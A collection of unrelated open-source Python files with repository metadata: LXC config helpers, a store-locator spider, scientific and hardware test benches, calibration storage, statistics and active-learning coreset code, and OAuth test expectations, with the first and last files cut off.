cfg['ipv4'] = config.get('DEFAULT', cgroup['ipv4'])
except configparser.NoOptionError:
cfg['ipv4'] = ''
try:
cfg['memlimit'] = re.sub(r'[a-zA-Z]', '',
config.get('DEFAULT', cgroup['memlimit']))
except configparser.NoOptionError:
cfg['memlimit'] = ''
try:
cfg['swlimit'] = re.sub(r'[a-zA-Z]', '',
config.get('DEFAULT', cgroup['swlimit']))
except configparser.NoOptionError:
cfg['swlimit'] = ''
try:
cfg['cpus'] = config.get('DEFAULT', cgroup['cpus'])
except configparser.NoOptionError:
cfg['cpus'] = ''
try:
cfg['shares'] = config.get('DEFAULT', cgroup['shares'])
except configparser.NoOptionError:
cfg['shares'] = ''
if '%s.conf' % name in ls_auto():
cfg['auto'] = True
else:
cfg['auto'] = False
return cfg
def push_net_value(key, value):
'''
replace a var in the lxc-net config file
'''
filename = get_net_settings_fname()
if filename:
config = configparser.RawConfigParser()
config.readfp(FakeSection(open(filename)))
if not value:
config.remove_option('DEFAULT', key)
else:
config.set('DEFAULT', key, value)
with open(filename, 'wb') as configfile:
config.write(configfile)
DelSection(filename=filename)
load = open(filename, 'r')
read = load.readlines()
load.close()
i = 0
while i < len(read):
if ' = ' in read[i]:
split = read[i].split(' = ')
split[1] = split[1].strip('\n')
if '\"' in split[1]:
read[i] = '%s=%s\n' % (split[0].upper(), split[1])
else:
read[i] = '%s=\"%s\"\n' % (split[0].upper(), split[1])
i += 1
load = open(filename, 'w')
load.writelines(read)
load.close()
def push_config_value(key, value, container=None):
'''
replace a var in a container config file
'''
def save_cgroup_devices(filename=None):
'''
returns multiple values (lxc.cgroup.devices.deny and
lxc.cgroup.devices.allow) in a list because configparser cannot
make this...
'''
if filename:
values = []
i = 0
load = open(filename, 'r')
read = load.readlines()
load.close()
while i < len(read):
if not read[i].startswith('#') and \
re.match('lxc.cgroup.devices.deny|'
'lxc.cgroup.devices.allow', read[i]):
values.append(read[i])
i += 1
return values
if container:
if os.geteuid():
filename = os.path.expanduser('~/.local/share/lxc/%s/config' %
container)
else:
filename = '/var/lib/lxc/%s/config' % container
save = save_cgroup_devices(filename=filename)
config = configparser.RawConfigParser()
config.readfp(FakeSection(open(filename)))
if not value:
config.remove_option('DEFAULT', key)
elif key == cgroup['memlimit'] or key == cgroup['swlimit'] \
and value is not False:
config.set('DEFAULT', key, '%sM' % value)
else:
config.set('DEFAULT', key, value)
# Bugfix (can't duplicate keys with config parser)
if config.has_option('DEFAULT', cgroup['deny']) or \
config.has_option('DEFAULT', cgroup['allow']):
config.remove_option('DEFAULT', cgroup['deny'])
config.remove_option('DEFAULT', cgroup['allow'])
with open(filename, 'wb') as configfile:
config.write(configfile)
DelSection(filename=filename)
with open(filename, "a") as configfile:
configfile.writelines(save)
def net_restart():
'''
restarts LXC networking
'''
cmd = ['/usr/sbin/service lxc-net restart']
try:
subprocess.check_call(cmd, shell=True)
return 0
except CalledProcessError:
return 1
|
74f8b117608f9ecda972df88621b67d98baa62d5
|
02b8727cb27298f8f0c0f0c4235045bcc9c290f9
|
/habanero/cn_formats.py
|
a6bb94b54b456f50c2839ce75b4fbb6e5ba98e50
|
[
"MIT"
] |
permissive
|
sckott/habanero
|
d97d678a39771b91941f6c4f4c2a4f6f410f8465
|
8cbe3a8f283f3bf3135459070022ad1324252a15
|
refs/heads/main
| 2023-09-01T02:46:52.231185
| 2023-07-27T21:51:28
| 2023-07-27T21:51:28
| 43,704,742
| 160
| 30
|
MIT
| 2023-09-13T13:03:58
| 2015-10-05T18:23:28
|
Python
|
UTF-8
|
Python
| false
| false
| 1,076
|
py
|
cn_formats.py
|
cn_formats = [
"rdf-xml",
"turtle",
"citeproc-json",
"citeproc-json-ish",
"text",
"ris",
"bibtex",
"crossref-xml",
"datacite-xml",
"bibentry",
"crossref-tdm",
]
cn_format_headers = {
"rdf-xml": "application/rdf+xml",
"turtle": "text/turtle",
"citeproc-json": "transform/application/vnd.citationstyles.csl+json",
"text": "text/x-bibliography",
"ris": "application/x-research-info-systems",
"bibtex": "application/x-bibtex",
"crossref-xml": "application/vnd.crossref.unixref+xml",
"datacite-xml": "application/vnd.datacite.datacite+xml",
"bibentry": "application/x-bibtex",
"crossref-tdm": "application/vnd.crossref.unixsd+xml",
}
cn_types = {
"rdf-xml": "text/xml",
"turtle": "text/plain",
"citeproc-json": "application/json",
"citeproc-json-ish": "application/json",
"text": "text/plain",
"ris": "text/plain",
"bibtex": "text/plain",
"crossref-xml": "text/xml",
"datacite-xml": "text/xml",
"bibentry": "text/plain",
"crossref-tdm": "text/xml",
}
|
d6fbcf48b3bcbba76f9ef6b43566af61943caa4b
|
71acb7214efd91c0d327f6d8958e1798eadb4401
|
/locations/spiders/goldsmiths_gb.py
|
40d5ce6ddccfdb2bafbf5fbd059a3d6f99195c90
|
[
"CC0-1.0",
"MIT"
] |
permissive
|
alltheplaces/alltheplaces
|
21b9f8b4ace1352e52ae7b8f8825a930d2cb033e
|
1bcbb55cfcf06f2c714465570711f6e83f205c22
|
refs/heads/master
| 2023-08-30T19:45:35.098658
| 2023-08-30T17:51:54
| 2023-08-30T17:51:54
| 61,166,935
| 453
| 176
|
NOASSERTION
| 2023-09-14T17:16:40
| 2016-06-15T01:09:18
|
Python
|
UTF-8
|
Python
| false
| false
| 1,844
|
py
|
goldsmiths_gb.py
|
from scrapy import Spider
from scrapy.http import JsonRequest
from locations.dict_parser import DictParser
from locations.hours import OpeningHours
class GoldsmithsGBSpider(Spider):
name = "goldsmiths_gb"
item_attributes = {"brand": "Goldsmiths", "brand_wikidata": "Q16993095"}
start_urls = ["https://www.goldsmiths.co.uk/store-finder?q=&latitude=0&longitude=0&page=0"]
def parse(self, response, **kwargs):
for location in response.json()["results"]:
location["ref"] = location.pop("name")
location["address"]["street_address"] = ", ".join(
filter(None, [location["address"].get("line1"), location["address"].get("line2")])
)
location["address"]["country"] = location["address"]["country"]["isocode"]
location["phone"] = location["address"]["phone"]
location["email"] = location["address"]["email"]
item = DictParser.parse(location)
item["website"] = f'https://www.goldsmiths.co.uk/store/{item["ref"]}'
item["opening_hours"] = OpeningHours()
for rule in location["openingHours"]["weekDayOpeningList"]:
if rule["closed"]:
continue
item["opening_hours"].add_range(
rule["weekDay"],
rule["openingTime"]["formattedHour"],
rule["closingTime"]["formattedHour"],
time_format="%I:%M %p",
)
yield item
current_page = response.json()["pagination"]["currentPage"]
pages = response.json()["pagination"]["numberOfPages"]
if current_page < pages:
yield JsonRequest(
url=f"https://www.goldsmiths.co.uk/store-finder?q=&latitude=0&longitude=0&page={current_page+1}"
)
|
f9fb7840aa8d13f262b44b35e8d7585c0d37fd2a
|
5599d46fdd4ecfa3a7d9ccb8e2aee648a5a0044c
|
/tests/tests/test_evaluate.py
|
ddaab032534b3db6e7824edb4de29501ce69875d
|
[] |
no_license
|
MrOlm/drep
|
552e95e7057bbe9550de832500fc51229b0bee27
|
27691e3d105693d7a42f2402366101c498186a27
|
refs/heads/master
| 2023-05-26T08:22:18.393677
| 2023-05-18T15:56:13
| 2023-05-18T15:56:13
| 69,408,336
| 200
| 44
| null | 2023-02-06T19:03:08
| 2016-09-27T23:55:43
|
Python
|
UTF-8
|
Python
| false
| false
| 2,774
|
py
|
test_evaluate.py
|
import os
import glob
import shutil
import pandas as pd
import importlib
import logging
import pytest
import tests.test_utils as test_utils
import drep
from drep import argumentParser
from drep.controller import Controller
from drep.WorkDirectory import WorkDirectory
@pytest.fixture()
def self():
self = test_utils.load_common_self()
yield self
self.teardown()
def test_tertiary_clustering_1(self):
'''
Test --run_tertiary_clustering fully
'''
test_dir = self.test_dir
# Check that wont run without dereplicate
args = drep.argumentParser.parse_args(
['compare', self.wd_loc, '--run_tertiary_clustering', '-g'] + self.genomes)
try:
drep.controller.Controller().parseArguments(args)
assert False
except ValueError:
pass
args = drep.argumentParser.parse_args(
['dereplicate', self.wd_loc, '--run_tertiary_clustering', '--ignoreGenomeQuality', '-g'] + self.genomes)
drep.controller.Controller().parseArguments(args)
# Load test results
wd = drep.WorkDirectory.WorkDirectory(self.wd_loc)
Cdb = wd.get_db('Cdb').sort_values('genome').reset_index(drop=True)
# Load solutions
wdS = drep.WorkDirectory.WorkDirectory(self.s_wd_loc)
CdbS = wdS.get_db('Cdb').sort_values('genome').reset_index(drop=True)
assert 'original_secondary_cluster' not in CdbS.columns
assert 'original_secondary_cluster' in Cdb.columns
def test_tertiary_clustering_2(self):
'''
Quick tests for --run_tertiary_clustering fully
'''
test_dir = self.test_dir
# Edit Cdb and Wdb
wd = drep.WorkDirectory.WorkDirectory(self.working_wd_loc)
Cdb = wd.get_db('Cdb')
Cdb['secondary_cluster'] = [c if g != 'Enterococcus_faecalis_T2.fna' else '1_3' for c, g in zip(Cdb['secondary_cluster'], Cdb['genome'])]
Wdb = wd.get_db('Wdb')
db = pd.DataFrame({'genome':['Enterococcus_faecalis_T2.fna'], 'cluster':['1_3'], 'score':[50]})
Wdb = pd.concat([Wdb, db])
assert len(Wdb) == 5
wd.store_db(Wdb, 'Wdb')
wd.store_db(Cdb, 'Cdb')
# Run tertiary clustering
args = drep.argumentParser.parse_args(
['dereplicate', self.working_wd_loc, '--run_tertiary_clustering', '--S_algorithm', 'ANImf', '-sa', '0.99', '-g'] + self.genomes)
drep.d_evaluate.d_evaluate_wrapper(args.work_directory, evaluate=['2'], **vars(args))
wd = drep.WorkDirectory.WorkDirectory(self.working_wd_loc)
Cdb = wd.get_db('Cdb').sort_values('genome').reset_index(drop=True)
Wdb = wd.get_db('Wdb').sort_values('genome').reset_index(drop=True)
assert len(Cdb['secondary_cluster'].unique()) == 4
assert len(Cdb['original_secondary_cluster'].unique()) == 5
assert len(Wdb) == 4
assert '1_1.3' in Cdb['secondary_cluster'].tolist()
|
8b349f14090c69347de153c92f10bedd447785c8
|
157d84f8aafc76ba9ea0dbbf08ede744966b4250
|
/tools/development/setup_test_agent.py
|
cd7c1ae73a4085ab024cdf37e85a670379297d8b
|
[
"Apache-2.0",
"LicenseRef-scancode-warranty-disclaimer"
] |
permissive
|
rancher/cattle
|
81d165a0339a41950561fe534c7529ec74203c56
|
82d154a53f4089fecfb9f320caad826bb4f6055f
|
refs/heads/v1.6
| 2023-08-27T20:19:31.989806
| 2020-05-01T18:15:55
| 2020-05-01T20:11:28
| 18,023,059
| 487
| 233
|
Apache-2.0
| 2022-01-03T18:07:33
| 2014-03-23T00:19:52
|
Java
|
UTF-8
|
Python
| false
| false
| 957
|
py
|
setup_test_agent.py
|
#!/usr/bin/env python
import cattle
def find_instance(instance):
hosts = instance.hosts()
if len(hosts) > 0:
return hosts[0].agent().uuid == 'test-agent'
return False
client = cattle.from_env()
UUID = 'docker0-agent-instance-provider'
nsp = client.list_network_service_provider(uuid=UUID)[0]
instances = filter(find_instance, nsp.instances())
if len(instances) != 1:
raise Exception('Found {} instances, expect 1. Try running a container'
'first'.format(len(instances)))
account = instances[0].agent().account()
found = False
for cred in account.credentials():
if cred.kind == 'apiKey' and cred.publicValue == 'ai':
found = True
if not found:
print 'Creating credential for account', account.id
client.create_credential(accountId=account.id,
publicValue='ai',
secretValue='aipass',
kind='apiKey')
|
cfa7f1cd22909e05461fc27046544abe96b7e2e8
|
1ffa0900d91ff7dc76e933489d354252edc5dbb9
|
/gateware/sim/test_slow_adc.py
|
d39476383cdc8bdce5a148724647ebf8b070dd22
|
[] |
no_license
|
softerhardware/Hermes-Lite2
|
6b05ef86f83e2c2b83ae622d3867f790532bbce0
|
0a6e07c37a23cd3a8721b6c3089e28721c378883
|
refs/heads/master
| 2023-08-05T17:16:25.996884
| 2023-07-27T04:21:47
| 2023-07-27T04:21:47
| 74,639,005
| 177
| 82
| null | 2022-02-04T06:26:33
| 2016-11-24T04:53:08
|
HTML
|
UTF-8
|
Python
| false
| false
| 3,517
|
py
|
test_slow_adc.py
|
#!/usr/bin/env python
from myhdl import *
import os
import i2c
module = 'slow_adc'
testbench = 'test_%s' % module
srcs = []
srcs.append("../rtl/%s.v" % module)
srcs.append("../rtl/i2c_master.v")
srcs.append("%s.v" % testbench)
src = ' '.join(srcs)
build_cmd = "iverilog -g2012 -o %s.vvp %s" % (testbench, src)
verilogtb = """
`timescale 1ns / 1ps
/*
* Testbench for i2c_master
*/
module test_slow_adc;
// Parameters
// Inputs
reg clk = 0;
reg rst = 0;
reg [7:0] current_test = 0;
reg scl_i = 1;
reg sda_i = 1;
// Outputs
wire [11:0] ain0, ain1, ain2, ain3;
wire scl_o;
wire scl_t;
wire sda_o;
wire sda_t;
initial begin
// myhdl integration
$from_myhdl(
clk,
rst,
scl_i,
sda_i
);
$to_myhdl(
ain0,
ain1,
ain2,
ain3,
scl_o,
scl_t,
sda_o,
sda_t
);
// dump file
$dumpfile("test_slow_adc.lxt");
$dumpvars(0, test_slow_adc);
end
slow_adc UUT (
.clk(clk),
.rst(rst),
.ain0(ain0),
.ain1(ain1),
.ain2(ain2),
.ain3(ain3),
.scl_i(scl_i),
.scl_o(scl_o),
.scl_t(scl_t),
.sda_i(sda_i),
.sda_o(sda_o),
.sda_t(sda_t)
);
endmodule
"""
f = open(testbench+".v","w")
f.write(verilogtb)
f.close()
def bench():
# Inputs
clk = Signal(bool(0))
rst = Signal(bool(0))
ain0 = Signal(intbv(0)[12:])
ain1 = Signal(intbv(0)[12:])
ain2 = Signal(intbv(0)[12:])
ain3 = Signal(intbv(0)[12:])
scl_i = Signal(bool(1))
sda_i = Signal(bool(1))
scl_o = Signal(bool(1))
scl_t = Signal(bool(1))
sda_o = Signal(bool(1))
sda_t = Signal(bool(1))
s1_scl_i = Signal(bool(1))
s1_sda_i = Signal(bool(1))
s1_scl_o = Signal(bool(1))
s1_scl_t = Signal(bool(1))
s1_sda_o = Signal(bool(1))
s1_sda_t = Signal(bool(1))
# I2C memory model 1
i2c_mem_inst1 = i2c.I2CModMem(1024)
i2c_mem_logic1 = i2c_mem_inst1.create_logic(
scl_i=s1_scl_i,
scl_o=s1_scl_o,
scl_t=s1_scl_t,
sda_i=s1_sda_i,
sda_o=s1_sda_o,
sda_t=s1_sda_t,
abw=1,
address=0x34,
latency=0,
name='slave1'
)
# DUT
if os.system(build_cmd):
raise Exception("Error running build command")
dut = Cosimulation(
"vvp -m myhdl %s.vvp -lxt2" % testbench,
clk=clk,
rst=rst,
ain0=ain0,
ain1=ain1,
ain2=ain2,
ain3=ain3,
scl_i=scl_i,
scl_o=scl_o,
scl_t=scl_t,
sda_i=sda_i,
sda_o=sda_o,
sda_t=sda_t
)
@always_comb
def bus():
# emulate I2C wired AND
##print(scl_o)
scl_i.next = scl_o & s1_scl_o;
sda_i.next = sda_o & s1_sda_o;
s1_scl_i.next = scl_o & s1_scl_o;
s1_sda_i.next = sda_o & s1_sda_o;
@always(delay(4))
def clkgen():
clk.next = not clk
@instance
def check():
yield delay(100)
yield clk.posedge
rst.next = 1
yield clk.posedge
rst.next = 0
yield clk.posedge
yield delay(100)
for i in range(0,20100):
yield clk.posedge
assert ain0==0x0708
assert ain1==0x090a
assert ain2==0x0b0c
assert ain3==0x0d0e
raise StopSimulation
return dut, i2c_mem_logic1, bus, clkgen, check
def test_bench():
sim = Simulation(bench())
sim.run()
if __name__ == '__main__':
print("Running test...")
test_bench()
|
1922263dec3c33f098b31ceab79190b5379aac0c
|
cb3b27f0ed142ba31d73e44d7d3214c781b84eb6
|
/setup.py
|
df4098796e85d6dafb275b84d1d56610f7e8370f
|
[
"MIT"
] |
permissive
|
mpcabd/python-arabic-reshaper
|
879f08f1d28f5460a87d721f1289cc1dfe58f904
|
2990ceb11276a278849abc97f245aa3eb09173cc
|
refs/heads/master
| 2023-02-01T18:04:47.534010
| 2023-01-10T14:33:44
| 2023-01-10T14:33:44
| 4,286,622
| 372
| 83
|
MIT
| 2022-10-13T14:04:07
| 2012-05-10T15:57:45
|
Python
|
UTF-8
|
Python
| false
| false
| 1,558
|
py
|
setup.py
|
#!/usr/bin/env python
# coding=utf-8
from setuptools import setup
import io
import os
with io.open('README.md', 'r', encoding='utf-8') as fh:
long_description = fh.read()
setup(
name='arabic_reshaper',
description=('Reconstruct Arabic sentences to be used in'
' applications that do not support Arabic'),
long_description=long_description,
long_description_content_type='text/markdown',
version='3.0.0',
platforms='ALL',
license='MIT',
packages=['arabic_reshaper'],
extras_require={
'with-fonttools': ['fonttools>=4.0']
},
author='Abdullah Diab',
author_email='mpcabd@gmail.com',
maintainer='Abdullah Diab',
maintainer_email='mpcabd@gmail.com',
package_dir={'arabic_reshaper': 'arabic_reshaper'},
test_suite='arabic_reshaper.tests',
include_package_data=True,
keywords='arabic shaping reshaping reshaper',
url='https://github.com/mpcabd/python-arabic-reshaper/',
download_url=('https://github.com/mpcabd/'
'python-arabic-reshaper/tarball/master'),
classifiers=[
'Natural Language :: Arabic',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
'Programming Language :: Python :: 3.10',
'Programming Language :: Python :: 3.11',
'Topic :: Software Development :: Libraries :: Python Modules',
],
)
|
58bfe50a683c8dd71e4633887f79ec262f03ed1a
|
6fdb4eaf5b0e6dbd7db4bf947547541e9aebf110
|
/api/src/opentrons/calibration_storage/ot2/pipette_offset.py
|
83616a3737a85cd201129e914a4d324adfd912d5
|
[
"LicenseRef-scancode-warranty-disclaimer",
"Apache-2.0"
] |
permissive
|
Opentrons/opentrons
|
874321e01149184960eeaeaa31b1d21719a1ceda
|
026b523c8c9e5d45910c490efb89194d72595be9
|
refs/heads/edge
| 2023-09-02T02:51:49.579906
| 2023-08-31T16:02:45
| 2023-08-31T16:02:45
| 38,644,841
| 326
| 174
|
Apache-2.0
| 2023-09-14T21:47:20
| 2015-07-06T20:41:01
|
Python
|
UTF-8
|
Python
| false
| false
| 4,005
|
py
|
pipette_offset.py
|
import json
import typing
import logging
from pydantic import ValidationError
from dataclasses import asdict
from opentrons import config, types
from .. import file_operators as io, types as local_types
from .models import v1
from opentrons.types import Mount, Point
from opentrons.util.helpers import utc_now
log = logging.getLogger(__name__)
# Delete Pipette Offset Calibrations
def delete_pipette_offset_file(pipette: str, mount: Mount) -> None:
"""
Delete pipette offset file based on mount and pipette serial number
:param pipette: pipette serial number
:param mount: pipette mount
"""
offset_dir = config.get_opentrons_path("pipette_calibration_dir")
offset_path = offset_dir / mount.name.lower() / f"{pipette}.json"
io.delete_file(offset_path)
def clear_pipette_offset_calibrations() -> None:
"""
Delete all pipette offset calibration files.
"""
io._remove_json_files_in_directories(
config.get_opentrons_path("pipette_calibration_dir")
)
# Save Pipette Offset Calibrations
def save_pipette_calibration(
offset: Point,
pip_id: str,
mount: Mount,
tiprack_hash: str,
tiprack_uri: str,
cal_status: typing.Optional[
typing.Union[local_types.CalibrationStatus, v1.CalibrationStatus]
] = None,
) -> None:
pip_dir = config.get_opentrons_path("pipette_calibration_dir") / mount.name.lower()
if isinstance(cal_status, local_types.CalibrationStatus):
cal_status_model = v1.CalibrationStatus(**asdict(cal_status))
elif isinstance(cal_status, v1.CalibrationStatus):
cal_status_model = cal_status
else:
cal_status_model = v1.CalibrationStatus()
pipette_calibration = v1.InstrumentOffsetModel(
offset=offset,
tiprack=tiprack_hash,
uri=tiprack_uri,
last_modified=utc_now(),
source=local_types.SourceType.user,
status=cal_status_model,
)
io.save_to_file(pip_dir, pip_id, pipette_calibration)
# Get Pipette Offset Calibrations
def get_pipette_offset(
pipette_id: str, mount: Mount
) -> typing.Optional[v1.InstrumentOffsetModel]:
try:
pipette_calibration_filepath = (
config.get_opentrons_path("pipette_calibration_dir")
/ mount.name.lower()
/ f"{pipette_id}.json"
)
return v1.InstrumentOffsetModel(
**io.read_cal_file(pipette_calibration_filepath)
)
except FileNotFoundError:
log.warning(f"Calibrations for {pipette_id} on {mount} does not exist.")
return None
except (json.JSONDecodeError, ValidationError):
log.warning(
f"Malformed calibrations for {pipette_id} on {mount}. Please factory reset your calibrations."
)
return None
def get_all_pipette_offset_calibrations() -> typing.List[v1.PipetteOffsetCalibration]:
"""
A helper function that will list all of the pipette offset
calibrations.
:return: A list of dictionary objects representing all of the
pipette offset calibration files found on the robot.
"""
pipette_calibration_dir = config.get_opentrons_path("pipette_calibration_dir")
pipette_calibration_list = []
for filepath in pipette_calibration_dir.glob("**/*.json"):
pipette_id = filepath.stem
mount = Mount.string_to_mount(filepath.parent.stem)
calibration = get_pipette_offset(pipette_id, mount)
if calibration:
pipette_calibration_list.append(
v1.PipetteOffsetCalibration(
pipette=pipette_id,
mount=mount.name.lower(),
offset=types.Point(*calibration.offset),
tiprack=calibration.tiprack,
uri=calibration.uri,
last_modified=calibration.last_modified,
source=calibration.source,
status=calibration.status,
)
)
return pipette_calibration_list
|
7f4efed1d9815d01a3e9507021162d0289279bb1
|
749af8e81d5ccd2d8714a34434a9c77772df551b
|
/statsmodels/tools/catadd.py
|
8016ba9630ff693b631ca6869a863d292a012687
|
[
"BSD-3-Clause"
] |
permissive
|
statsmodels/statsmodels
|
98ca67192c08bcc611ed3a75edaded2c7181ab98
|
01b19d7d111b29c183f620ff0a949ef6391ff8ee
|
refs/heads/main
| 2023-09-05T13:05:49.497076
| 2023-09-01T10:54:50
| 2023-09-01T10:54:50
| 1,885,237
| 8,666
| 3,023
|
BSD-3-Clause
| 2023-09-13T17:51:48
| 2011-06-12T17:04:50
|
Python
|
UTF-8
|
Python
| false
| false
| 1,010
|
py
|
catadd.py
|
import numpy as np
def add_indep(x, varnames, dtype=None):
'''
construct array with independent columns
x is either iterable (list, tuple) or instance of ndarray or a subclass
of it. If x is an ndarray, then each column is assumed to represent a
variable with observations in rows.
'''
# TODO: this needs tests for subclasses
if isinstance(x, np.ndarray) and x.ndim == 2:
x = x.T
nvars_orig = len(x)
nobs = len(x[0])
if not dtype:
dtype = np.asarray(x[0]).dtype
xout = np.zeros((nobs, nvars_orig), dtype=dtype)
count = 0
rank_old = 0
varnames_new = []
varnames_dropped = []
keepindx = []
for (xi, ni) in zip(x, varnames):
xout[:, count] = xi
rank_new = np.linalg.matrix_rank(xout)
if rank_new > rank_old:
varnames_new.append(ni)
rank_old = rank_new
count += 1
else:
varnames_dropped.append(ni)
return xout[:, :count], varnames_new
|
21d12c7d654f3963b1b5d7b24708a3f01b0af115
|
92d97211aebc18d62fdde441ea775198a231c362
|
/small_text/query_strategies/coresets.py
|
d7f7e0e7ab5a711e675d29a3fa9619d04d1c10d3
|
[
"MIT"
] |
permissive
|
webis-de/small-text
|
4a510bc4dd9a2110976121603bcc859581a5141c
|
2bb16b7413f85f3b933887c7054db45b5652d3a2
|
refs/heads/main
| 2023-09-03T06:00:20.976398
| 2023-08-19T18:28:43
| 2023-08-19T18:28:43
| 370,275,343
| 476
| 58
|
MIT
| 2023-08-23T20:54:25
| 2021-05-24T08:06:41
|
Python
|
UTF-8
|
Python
| false
| false
| 7,393
|
py
|
coresets.py
|
import warnings
import numpy as np
from sklearn.metrics import pairwise_distances
from small_text.query_strategies.strategies import EmbeddingBasedQueryStrategy
_DISTANCE_METRICS = ['cosine', 'euclidean']
def _check_coreset_size(x, n):
if n > x.shape[0]:
raise ValueError(f'n (n={n}) is greater the number of available samples (num_samples={x.shape[0]})')
def _cosine_distance(a, b, normalized=False):
sim = np.matmul(a, b.T)
if not normalized:
sim = sim / np.dot(np.linalg.norm(a, axis=1)[:, np.newaxis],
np.linalg.norm(b, axis=1)[np.newaxis, :])
return np.arccos(sim) / np.pi
def _euclidean_distance(a, b, normalized=False):
_ = normalized
return pairwise_distances(a, b, metric='euclidean')
def greedy_coreset(x, indices_unlabeled, indices_labeled, n, distance_metric='cosine',
batch_size=100, normalized=False):
"""Computes a greedy coreset [SS17]_ over `x` with size `n`.
Parameters
----------
x : np.ndarray
A matrix of row-wise vector representations.
indices_unlabeled : np.ndarray
Indices (relative to `dataset`) for the unlabeled data.
indices_labeled : np.ndarray
Indices (relative to `dataset`) for the unlabeled data.
n : int
Size of the coreset (in number of instances).
distance_metric : {'cosine', 'euclidean'}
Distance metric to be used.
batch_size : int
Batch size.
normalized : bool
If `True` the data `x` is assumed to be normalized,
otherwise it will be normalized where necessary.
Returns
-------
indices : numpy.ndarray
Indices relative to `x`.
References
----------
.. [SS17] Ozan Sener and Silvio Savarese. 2017.
Active Learning for Convolutional Neural Networks: A Core-Set Approach.
In International Conference on Learning Representations 2018 (ICLR 2018).
"""
_check_coreset_size(x, n)
num_batches = int(np.ceil(x.shape[0] / batch_size))
ind_new = []
if distance_metric == 'cosine':
dist_func = _cosine_distance
elif distance_metric == 'euclidean':
dist_func = _euclidean_distance
else:
raise ValueError(f'Invalid distance metric: {distance_metric}. '
f'Possible values: {_DISTANCE_METRICS}')
for _ in range(n):
indices_s = np.concatenate([indices_labeled, ind_new]).astype(np.int64)
dists = np.array([], dtype=np.float32)
for batch in np.array_split(x[indices_unlabeled], num_batches, axis=0):
dist = dist_func(batch, x[indices_s], normalized=normalized)
sims_batch = np.amin(dist, axis=1)
dists = np.append(dists, sims_batch)
dists[ind_new] = -np.inf
index_new = np.argmax(dists)
ind_new.append(index_new)
return np.array(ind_new)
class GreedyCoreset(EmbeddingBasedQueryStrategy):
"""Selects instances by constructing a greedy coreset [SS17]_ over document embeddings.
"""
def __init__(self, distance_metric='euclidean', normalize=True, batch_size=100):
"""
Parameters
----------
distance_metric : {'cosine', 'euclidean'}
Distance metric to be used.
.. versionadded:: 1.2.0
normalize : bool
Embeddings will be normalized before the coreset construction if True.
batch_size : int
Batch size used for computing document distances.
.. note::
The default distance metric before v1.2.0 used to be cosine distance.
.. seealso::
Function :py:func:`.greedy_coreset`
Docstrings of the underlying :py:func:`greedy_coreset` method.
"""
if distance_metric not in set(_DISTANCE_METRICS):
raise ValueError(f'Invalid distance metric: {distance_metric}. '
f'Possible values: {_DISTANCE_METRICS}')
if distance_metric != 'cosine':
warnings.warn('Default distance metric has changed from "cosine" '
'to "euclidean" in v1.2.0. This warning will disappear in '
'v2.0.0.')
self.distance_metric = distance_metric
self.normalize = normalize
self.batch_size = batch_size
def sample(self, clf, dataset, indices_unlabeled, indices_labeled, y, n, embeddings,
embeddings_proba=None):
if self.normalize:
from sklearn.preprocessing import normalize
embeddings = normalize(embeddings, axis=1)
return greedy_coreset(embeddings, indices_unlabeled, indices_labeled, n,
distance_metric=self.distance_metric, normalized=self.normalize)
def __str__(self):
return f'GreedyCoreset(distance_metric={self.distance_metric}, ' \
f'normalize={self.normalize}, batch_size={self.batch_size})'
def lightweight_coreset(x, x_mean, n, normalized=False, proba=None):
"""Computes a lightweight coreset [BLK18]_ of `x` with size `n`.
Parameters
----------
x : np.ndarray
2D array in which each row represents a sample.
x_mean : np.ndarray
Elementwise mean over the columns of `x`.
n : int
Coreset size.
normalized : bool
If `True` the data `x` is assumed to be normalized,
otherwise it will be normalized where necessary.
proba : np.ndarray or None
A probability distribution over `x`, which makes up half of the probability mass
of the sampling distribution. If `proba` is not `None` a uniform distribution is used.
Returns
-------
indices : numpy.ndarray
Indices relative to `x`.
"""
_check_coreset_size(x, n)
sim = x.dot(x_mean)
if not normalized:
sim = sim / (np.linalg.norm(x, axis=1) * np.linalg.norm(x_mean))
dists = np.arccos(sim) / np.pi
dists = np.square(dists)
sum_dists = dists.sum()
if proba is None:
uniform = 0.5 * 1 / x.shape[0]
proba = uniform + 0.5 * dists / sum_dists
else:
proba = 0.5 * proba / proba.sum() + 0.5 * dists / sum_dists
proba = proba / np.linalg.norm(proba, ord=1)
return np.random.choice(np.arange(x.shape[0]), n, replace=False, p=proba)
class LightweightCoreset(EmbeddingBasedQueryStrategy):
"""Selects instances by constructing a lightweight coreset [BLK18]_ over document embeddings.
"""
def __init__(self, normalize=True):
"""
Parameters
----------
normalize : bool
Embeddings will be normalized before the coreset construction if True.
"""
self.normalize = normalize
def sample(self, clf, dataset, indices_unlabeled, _indices_labeled, _y, n, embeddings,
embeddings_proba=None):
embeddings = embeddings[indices_unlabeled]
embeddings_mean = np.mean(embeddings, axis=0)
if self.normalize:
from sklearn.preprocessing import normalize
embeddings = normalize(embeddings)
embeddings_mean = normalize(embeddings_mean[np.newaxis, :])
embeddings_mean = embeddings_mean.ravel()
return lightweight_coreset(embeddings, embeddings_mean, n, normalized=self.normalize)
def __str__(self):
return f'LightweightCoreset(normalize={self.normalize})'
|
44b24006ac794d6e8fbc0cb8380887bd98010bee
|
2909c14ac6232b4867a3aca166945634da5f9b7a
|
/tests/functional_tests/expected_values/linkedin.py
|
f2ee89bd22865a3c8e031d9264869d6f698c81f8
|
[
"MIT"
] |
permissive
|
authomatic/authomatic
|
4c66cd6941e4309c8226ee935261ce2bd3bebde8
|
290e62e572f038fbd01d686a4556629f72037c15
|
refs/heads/master
| 2023-09-03T04:03:55.755212
| 2023-06-09T10:55:35
| 2023-06-09T10:55:35
| 8,073,983
| 289
| 67
|
MIT
| 2023-06-09T10:55:36
| 2013-02-07T14:13:35
|
Python
|
UTF-8
|
Python
| false
| false
| 2,360
|
py
|
linkedin.py
|
# -*- coding: utf-8 -*-
import re
import fixtures
import constants
from authomatic.providers import oauth2
conf = fixtures.get_configuration('linkedin')
CONFIG = {
'login_xpath': '//*[@id="session_key-oauth2SAuthorizeForm"]',
'password_xpath': '//*[@id="session_password-oauth2SAuthorizeForm"]',
'consent_xpaths': [],
'class_': oauth2.LinkedIn,
'scope': oauth2.LinkedIn.user_info_scope,
'user': {
'birth_date': None,
'city': None,
'country': conf.user_country,
'email': conf.user_email,
'first_name': conf.user_first_name,
'gender': None,
'id': conf.user_id,
'last_name': conf.user_last_name,
# 'link': re.compile(r'^https://www\.linkedin\.com/in/\w+$'),
'link': re.compile(r'^https://www\.linkedin\.com/.*'),
'locale': None,
